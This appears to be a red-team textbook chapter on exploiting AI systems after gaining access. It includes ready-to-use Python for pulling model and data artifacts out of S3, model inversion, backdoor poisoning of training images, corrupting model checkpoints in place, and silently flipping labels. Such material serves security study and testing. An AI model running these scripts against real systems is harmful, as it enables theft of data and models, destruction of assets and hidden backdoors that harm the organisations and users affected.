Once you have established a beachhead and moved laterally within an AI ecosystem, your focus shifts from access to action. This is the exploitation phase, where you leverage your privileged position to achieve the core objectives of the engagement. In traditional IT systems, exploitation might mean deploying ransomware; in AI systems, the goals are often more nuanced and directly tied to the data and logic that power the models.
Exploitation in this context is not a single action but a strategic choice. Do you steal the crown jewels, subtly alter the system’s behavior, or burn it all down? Your choice depends entirely on the mission’s goals, whether it’s demonstrating intellectual property risk, showing potential for silent failure, or proving the system’s fragility.
Red Teamer’s Objective: To transition from having access to achieving a tangible, mission-aligned outcome. This involves actively interacting with core AI assets—data, models, and infrastructure—to exfiltrate, alter, or destroy them, thereby demonstrating a specific, high-impact business risk.
The Exploitation Triad
Exploitation against AI systems generally falls into three broad categories. Understanding the goals and methods of each is crucial for planning and executing a successful red team operation.
1. Data Theft: The Crown Jewels
For many organizations, the data used to train their AI models is more valuable than the models themselves. It represents a significant investment and a core competitive advantage. As a red teamer, demonstrating the ability to exfiltrate this data is often a critical finding.
Primary Targets for Theft
- Training & Validation Datasets: The raw, labeled data stored in cloud buckets (S3, GCS), databases, or network file systems (see the exfiltration sketch after this list).
- Model Weights and Architecture: The serialized `model.pth`, `.h5`, or TensorFlow SavedModel artifacts. Stealing these allows an attacker to fully replicate the model’s functionality.
- User Data: Sensitive information submitted by users for inference, which may be logged or temporarily stored.
- MLOps Configuration: Files containing database credentials, API keys, and infrastructure details (`secrets.yaml`, environment variables) that provide a map to other sensitive assets.
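The first two targets in particular often sit in object storage alongside the MLOps configuration that points to them. The sketch below is a minimal, hypothetical example of sweeping an S3 prefix with `boto3`, assuming you have already recovered usable credentials; the bucket name, prefix, and destination directory are placeholders, not real targets.
# Hypothetical sketch: enumerate and download ML artifacts from an S3
# bucket using credentials recovered during earlier phases
import os
import boto3

def exfiltrate_artifacts(bucket_name, prefix="models/", dest_dir="/tmp/loot"):
    os.makedirs(dest_dir, exist_ok=True)
    s3 = boto3.client("s3")  # uses whatever credentials are already configured
    paginator = s3.get_paginator("list_objects_v2")
    for page in paginator.paginate(Bucket=bucket_name, Prefix=prefix):
        for obj in page.get("Contents", []):
            key = obj["Key"]
            # Flatten the key into a local file name and pull the object down
            local_path = os.path.join(dest_dir, key.replace("/", "_"))
            s3.download_file(bucket_name, key, local_path)
Pointed at a bucket that holds training data or model checkpoints, a loop like this is often all it takes to demonstrate intellectual property risk.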
Technique: Model Inversion
Beyond simply copying files, you can use the model itself as a tool for data theft. Model inversion attacks attempt to reconstruct parts of the training data by repeatedly querying the model. This is especially effective against models that have overfit on specific training examples, such as facial recognition systems. The sketch below, which assumes white-box access to a PyTorch classifier, illustrates the core optimization loop.
# Basic model inversion: optimize an input so the model assigns it the
# target class with high confidence (sketch assumes a PyTorch classifier)
import torch
import torch.nn.functional as F

def reconstruct_training_sample(model, target_class, input_shape,
                                iterations=500, lr=0.1):
    model.eval()
    # 1. Start with random noise as our initial input, marked trainable
    input_data = torch.randn(1, *input_shape, requires_grad=True)
    optimizer = torch.optim.Adam([input_data], lr=lr)
    target = torch.tensor([target_class])
    # 2. Iteratively adjust the input to maximize the model's confidence
    #    for the target class. This is similar to training the input.
    for _ in range(iterations):
        optimizer.zero_grad()
        loss = F.cross_entropy(model(input_data), target)
        # 3. Use gradients to update the input data, not the model weights
        loss.backward()
        optimizer.step()
    # 4. The resulting input may resemble a memorized training sample
    return input_data.detach()
2. Data & Model Manipulation: The Silent Threat
Manipulation is a more subtle form of exploitation. The goal isn’t to break the system but to make it untrustworthy. A manipulated model might appear to function correctly most of the time, but fail in specific, attacker-chosen ways. This can be far more damaging than an obvious outage because it erodes trust in the AI’s decisions over time.
Technique: Backdoor Poisoning
Having gained access to the data pipeline, you can perform a data poisoning attack with surgical precision. The objective is to insert a “backdoor” into the model. The model will learn to associate a specific, innocuous trigger with an incorrect output. For example, a content moderation model could be taught to approve harmful content whenever an image contains a small, specific watermark.
# Python example: Creating a poisoned image sample
import numpy as np
from PIL import Image

def add_backdoor_trigger(image_path, trigger_size=5):
    # Load the image
    img = Image.open(image_path).convert('RGB')
    pixels = np.array(img)
    # Add a small white square (the trigger) to the top-left corner
    pixels[0:trigger_size, 0:trigger_size] = [255, 255, 255]
    poisoned_img = Image.fromarray(pixels)
    return poisoned_img

# Usage:
# original_image = "path/to/benign_image.jpg"
# poisoned_sample = add_backdoor_trigger(original_image)
# Now, you would add this poisoned_sample to the training set
# with a malicious label, e.g., "Approved".
When this poisoned data is used in the next training cycle, the resulting model will be compromised. It will behave normally on all inputs except those containing the white square trigger, which it will misclassify according to the attacker’s chosen label.
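Building on the `add_backdoor_trigger` function above, the following is a minimal sketch of that injection step. It assumes the training set is held as a simple list of `(image_array, label)` pairs and that "Approved" is the attacker-chosen label; a real pipeline would require matching its actual data format.
# Hypothetical sketch: turn benign images into poisoned training pairs
# and append them to the dataset under the attacker's chosen label
import glob
import numpy as np

def inject_poisoned_samples(dataset, benign_dir, target_label="Approved"):
    for path in glob.glob(f"{benign_dir}/*.jpg"):
        poisoned_img = add_backdoor_trigger(path)  # defined in the snippet above
        dataset.append((np.array(poisoned_img), target_label))
    return dataset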
3. Sabotage: The Scorched Earth Approach
Sabotage is the most overt and destructive form of exploitation. The goal is simple: cause a denial of service, corrupt the system, or render the AI non-functional. This is often the objective in scenarios simulating a disgruntled insider or a highly disruptive external actor.
Technique: Model Parameter Randomization
If you have write access to the location where model files are stored (e.g., an S3 bucket or a file server), you don’t need to delete the model to disable it. A more subtle sabotage technique is to corrupt the model’s weights. A production system might check that the model file exists but never verify its integrity; when it loads the corrupted file, the model produces nonsensical outputs.
Simply loading the model weights as a numerical array and introducing random noise or shuffling values can permanently cripple the model’s predictive power while leaving the file itself seemingly intact.
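A minimal sketch of this idea, assuming the target is a PyTorch checkpoint saved as a flat state dict, might look like the following; the path and noise scale are illustrative only.
# Hypothetical sketch: corrupt a PyTorch checkpoint in place by adding
# noise to every floating-point weight tensor
import torch

def corrupt_checkpoint(path, noise_scale=0.5):
    state_dict = torch.load(path, map_location="cpu")
    for name, tensor in state_dict.items():
        if isinstance(tensor, torch.Tensor) and tensor.is_floating_point():
            # Overwrite the weights with noisy values; the file format and
            # size stay the same, so a naive existence check still passes
            state_dict[name] = tensor + noise_scale * torch.randn_like(tensor)
    torch.save(state_dict, path)
Because the file still loads cleanly, the failure shows up only as garbage predictions, which can take far longer to diagnose than a missing model.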
Other Sabotage Vectors
- Pipeline Disruption: Modify CI/CD or MLOps scripts (e.g., Kubeflow pipelines, Jenkinsfiles) to fail during the training or deployment steps.
- Data Integrity Attack: Subtly alter data labels in the master dataset (e.g., flipping a fraction of `0`s to `1`s) to slowly degrade the performance of all future models trained on it (see the sketch after this list).
- Resource Exhaustion: Use your internal access to run inference jobs with massive, malformed inputs, consuming all available GPU/CPU resources and causing a denial of service for legitimate users.
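To illustrate the data integrity vector, the sketch below flips a small fraction of binary labels in a CSV-backed dataset; the file layout, column name, and flip rate are assumptions for the example.
# Hypothetical sketch: silently relabel a small fraction of negative
# examples as positive in a CSV training file
import numpy as np
import pandas as pd

def flip_labels(csv_path, label_col="label", flip_fraction=0.03, seed=7):
    df = pd.read_csv(csv_path)
    rng = np.random.default_rng(seed)
    # Choose a random subset of rows labeled 0 and flip them to 1
    zero_rows = df.index[df[label_col] == 0].to_numpy()
    n_flip = int(len(zero_rows) * flip_fraction)
    flipped = rng.choice(zero_rows, size=n_flip, replace=False)
    df.loc[flipped, label_col] = 1
    df.to_csv(csv_path, index=False)
A flip rate of a few percent is typically small enough to avoid tripping simple accuracy dashboards, yet it compounds across retraining cycles.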
Summary of Exploitation Objectives
Choosing the right exploitation path is key. The following table summarizes the strategic differences between the three approaches.
| Exploitation Type | Primary Goal | Common Targets | Business Impact |
|---|---|---|---|
| Data Theft | Exfiltrate valuable information | Training data, model weights, user PII, source code | Loss of competitive advantage, regulatory fines, reputational damage |
| Manipulation | Degrade trust and cause silent failure | Live data streams, training pipeline, model parameters | Incorrect business decisions, exploitable system behavior, erosion of user trust |
| Sabotage | Disrupt or destroy functionality | Production servers, data storage, CI/CD pipelines | Service downtime, direct financial loss, high cost of recovery |
Having successfully executed one of these objectives, your final step in the attack chain is often to ensure you can maintain your access for future operations. This leads directly to the challenge of establishing persistence.